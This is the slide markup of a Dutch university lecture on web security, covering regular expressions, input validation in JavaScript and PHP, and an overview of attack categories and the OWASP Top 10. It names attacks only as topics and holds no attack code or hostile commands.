            <a:ext cx="5976664" cy="4957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87115" y="1275727"/>
            <a:ext cx="5400601" cy="56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Regular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280642" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>Beschrijven patronen voor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> matching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>Komen overeen met de formele reguliere talen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>Algemene gedaante: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>flags</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>Elke letter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>matcht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t> zichzelf, maar...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>Characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: \t, \n, \\, \s, \S, \w, \W, \d, \D, ., \.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>Classes: [0-9], [A-Z], [a-z0-9], [a5!*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>d-g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>], [^5!*.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>ef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>Anchors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: ^, $</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>Groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: (...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>Quantifiers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: ?, +, *, {4}, {1,4}, {4,}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1"/>
              <a:t>Flags</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>: i, 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740" y="2518296"/>
            <a:ext cx="13843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732" y="3090416"/>
            <a:ext cx="1460500" cy="50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51412" y="4973106"/>
            <a:ext cx="4248472" cy="400110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 New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/^[0-9]{4} {0,1}[A-Z]{2}$/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8964" y="1412776"/>
            <a:ext cx="8352928" cy="400110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 New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/^([A-Z]{2}-[A-Z]{2}-\d{2}|\d{2}-[A-Z]{3}-\d{1})$/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8964" y="1988840"/>
            <a:ext cx="8352928" cy="400110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ourier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/(\w|[_\-.])+@((\w|[_\-.])+\.)+[a-zA-Z]{2,}/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000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824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Regular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280642" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>JavaScript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PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>preg_match, preg_match_all, preg_grep, preg_split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9004" y="2060848"/>
            <a:ext cx="6912768" cy="1323439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var postcodeRegExp = /^[0-9]{4} {0,1}[A-Z]{2}$/;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800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if (!postcodeRegExp.test(somePostcode)) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  alert("Ongeldige postcode");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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916" y="4996914"/>
            <a:ext cx="9073008" cy="1323439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$postcodeRegExp = '/^[0-9]{4} {0,1}[A-Z]{2}$/';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800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if (preg_match($postcodeRegExp, $_POST['somePostcode']) !== 1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  validation_error("Ongeldige postcode");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US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9004" y="4843025"/>
            <a:ext cx="7488832" cy="1754327"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFCCE"/>
          </a:solidFill>
          <a:ln w="38100" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="63500" dir="2700000" sx="101000" sy="101000" algn="tl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$floatarray = preg_grep('/^(\d+)?\.\d+$/', $myarray);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$string="16 maart, 2016";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$pattern='/^(\d+) (\w+), (\d+)$/';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>$replacement='Het is $3, de $1e van de maand $2.';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>echo preg_replace($pattern, $replacement, $string);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34509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1567036" y="1226235"/>
            <a:ext cx="6912768" cy="5635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 essentie van het probleem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5" y="1295400"/>
            <a:ext cx="9568675" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>protocollen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complex</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Echte</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> experts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zeldzaam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>geen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>gezellige</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>mensen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p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lui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>maken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fouten</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Besteed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>genoeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r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opdrachten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, en...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>maak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fouten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tijdens</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> het </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tentamen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Verschil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bedoeld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>onbedoeld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gebruik</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Points of view: code is...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...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implementatie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algoritme</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>...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aantal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> regels </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tekst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verzameling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>instructies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rij</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> bytes,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rij</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nullen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enen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getal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/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12890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Real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5" y="1295400"/>
            <a:ext cx="9407519" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De meeste code is door amateurs geschreven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Unix werd ontwikkeld door </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1"/>
              <a:t>studenten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, nota bene...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>En nu flanst iedereen een website in elkaar...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Er is nauwelijks druk om secure code te schrijven</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Time-to-market, concurrentie-overwegingen, tijd=€</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>En zolang iedereen troep koopt, kom je ermee weg!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Vulnerability cycle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ontdekking, exploit, media, hype, patch, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>welterusten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Buggy patches, ongepatcht, script kiddy tooling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>De Wet van Behoud van Ellende</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="ttps://9to5mac.files.wordpress.com/2016/03/transmission-mac.jpg?w=2500&amp;h=0#038;h=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6" y="1412776"/>
            <a:ext cx="952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3100" y="3090168"/>
            <a:ext cx="5688013" cy="75536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/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91420" tIns="35992" rIns="91420" bIns="71985"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</a:rPr>
              <a:t>"Binnen een gesloten systeem blijft de totale hoeveelheid ellende constant. Als het ene probleem wordt opgelost, zal daardoor het volgende probleem ontstaan."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6" y="1323785"/>
            <a:ext cx="9902825" cy="563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291" y="0"/>
            <a:ext cx="5688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/>
              <a:t>Think outside of the box!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Maak geen aannames, bekijk het van een afstand</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Lastig, ook als het gaat om het vinden van fouten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>En dan nog...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"Security is not an afterthought"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Sommige dingen moet je misschien niet willen</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Verbeter de wereld, begin bij jezelf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Ga uit van het slechtste in je medemens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er nog hoop?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64" y="1364771"/>
            <a:ext cx="7956884" cy="5304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228" y="1150144"/>
            <a:ext cx="6607597" cy="4362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05114"/>
            <a:ext cx="6679604" cy="4652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692" y="1484784"/>
            <a:ext cx="5080000" cy="50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400" y="1150144"/>
            <a:ext cx="7797800" cy="612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980" y="344120"/>
            <a:ext cx="7776864" cy="65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6" y="1295400"/>
            <a:ext cx="9208634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Operation level attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Fysiek, social engineering, default accounts, DDOS, password cracking, phishing, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Hangsloten, beleid, verwijdering, controles, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Architecture &amp; design level attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Race conditions, man-in-the-middle, session hijacking, packet-sniffing, replay attacks, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Locking, encryption, session dynamics, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Implementation level attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Buffer overflows, back doors, parsing errors, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Controles, Quality Assurance, input validation, ...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3"/>
            <a:ext cx="3655268" cy="60492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196" y="1124744"/>
            <a:ext cx="3871293" cy="6044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671" y="1124744"/>
            <a:ext cx="3871293" cy="6065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" y="1124744"/>
            <a:ext cx="4032448" cy="6055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164" y="1124744"/>
            <a:ext cx="4285548" cy="6048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4655" y="1124744"/>
            <a:ext cx="4015309" cy="6068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4" y="1124744"/>
            <a:ext cx="3882008" cy="60818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0325" y="1124744"/>
            <a:ext cx="5572500" cy="6048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932" y="1124744"/>
            <a:ext cx="8708468" cy="6192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3140" y="1112044"/>
            <a:ext cx="5101208" cy="6054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Soorten aanvallen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1132" y="1378867"/>
            <a:ext cx="4860460" cy="5218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884" y="1256060"/>
            <a:ext cx="9541664" cy="591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3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9120186" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top 10 risico's volgens OWASP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Open Web Application Security Project, 2010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02" y="1963037"/>
            <a:ext cx="8339882" cy="4706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76" y="1400076"/>
            <a:ext cx="9661997" cy="51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992" y="1812156"/>
            <a:ext cx="2972892" cy="1827960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="Content Placeholder 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:srcRect t="3179" b="3179"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="220015" y="1524124"/>
            <a:ext cx="6256909" cy="371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works...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3655268" y="1806724"/>
            <a:ext cx="1584176" cy="6480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175548" y="1806724"/>
            <a:ext cx="936104" cy="6480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8577212" y="2348880"/>
            <a:ext cx="576064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7111652" y="2348880"/>
            <a:ext cx="576064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198884" y="1340768"/>
            <a:ext cx="6264696" cy="41044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4948" y="5923290"/>
            <a:ext cx="4896544" cy="38603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/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91420" tIns="35992" rIns="91420" bIns="71985"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+mn-lt"/>
              </a:rPr>
              <a:t>Vrijwel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>overal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t> ligt misbruik op de loer!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="+mn-lt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6993036" y="2943123"/>
            <a:ext cx="851396" cy="78660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967636" y="1747416"/>
            <a:ext cx="851396" cy="78660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8441704" y="2924944"/>
            <a:ext cx="851396" cy="78660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6247555" y="4005064"/>
            <a:ext cx="3960441" cy="3024336"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gebruiker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>logt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session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gestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p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leefden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> nog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gelukkig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 6" descr="J:\hack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22" y="3861048"/>
            <a:ext cx="3227426" cy="287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8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7" grpId="0" animBg="1"/>
      <p:bldP spid="38" grpId="0" animBg="1"/>
      <p:bldP spid="41" grpId="0" animBg="1"/>
      <p:bldP spid="44" grpId="0" animBg="1"/>
      <p:bldP spid="45" grpId="0" animBg="1"/>
      <p:bldP spid="46" grpId="0" animBg="1"/>
      <p:bldP spid="39" grpId="0" build="p"/>
    </p:bld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2787</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>482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Contemporary Portrait</vt:lpstr>
      <vt:lpstr>Custom Design</vt:lpstr>
      <vt:lpstr>Websecurity Workshop</vt:lpstr>
      <vt:lpstr>Inhoud</vt:lpstr>
      <vt:lpstr>Be afraid. Be very afraid.</vt:lpstr>
      <vt:lpstr>De essentie van het probleem</vt:lpstr>
      <vt:lpstr>The Real World</vt:lpstr>
      <vt:lpstr>Is er nog hoop?</vt:lpstr>
      <vt:lpstr>Soorten aanvallen</vt:lpstr>
      <vt:lpstr>Top 10 risico's volgens OWASP </vt:lpstr>
      <vt:lpstr>How it works...</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Passwords</vt:lpstr>
      <vt:lpstr>Captcha</vt:lpstr>
      <vt:lpstr>Captcha</vt:lpstr>
      <vt:lpstr>Bad Captcha!</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Session dynamics</vt:lpstr>
      <vt:lpstr>Session hijacking</vt:lpstr>
      <vt:lpstr>Session guessing </vt:lpstr>
      <vt:lpstr>Same Origin policy</vt:lpstr>
      <vt:lpstr>Session fixation</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>Cross-site scripting</vt:lpstr>
      <vt:lpstr>Cross-site request forgery</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>SQL injection</vt:lpstr>
      <vt:lpstr>Security</vt:lpstr>
      <vt:lpstr>Input validation</vt:lpstr>
      <vt:lpstr>Perl</vt:lpstr>
      <vt:lpstr>Obfuscated Perl</vt:lpstr>
      <vt:lpstr>Regular expressions</vt:lpstr>
      <vt:lpstr>Regular expressions</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company>Universiteit Utrecht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Webtechnologie - Security</dc:title>
  <dc:subject/>
  <dc:creator>Lennart Herlaar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>PD. Autologon7</cp:lastModifiedBy>
  <cp:revision>1985</cp:revision>
  <cp:lastPrinted>2000-03-07T11:03:11Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">1998-01-21T09:14:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-03-13T12:15:55Z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C:\DataLennart\Mavdi</vt:lpwstr>
  </property>
</Properties>
</file>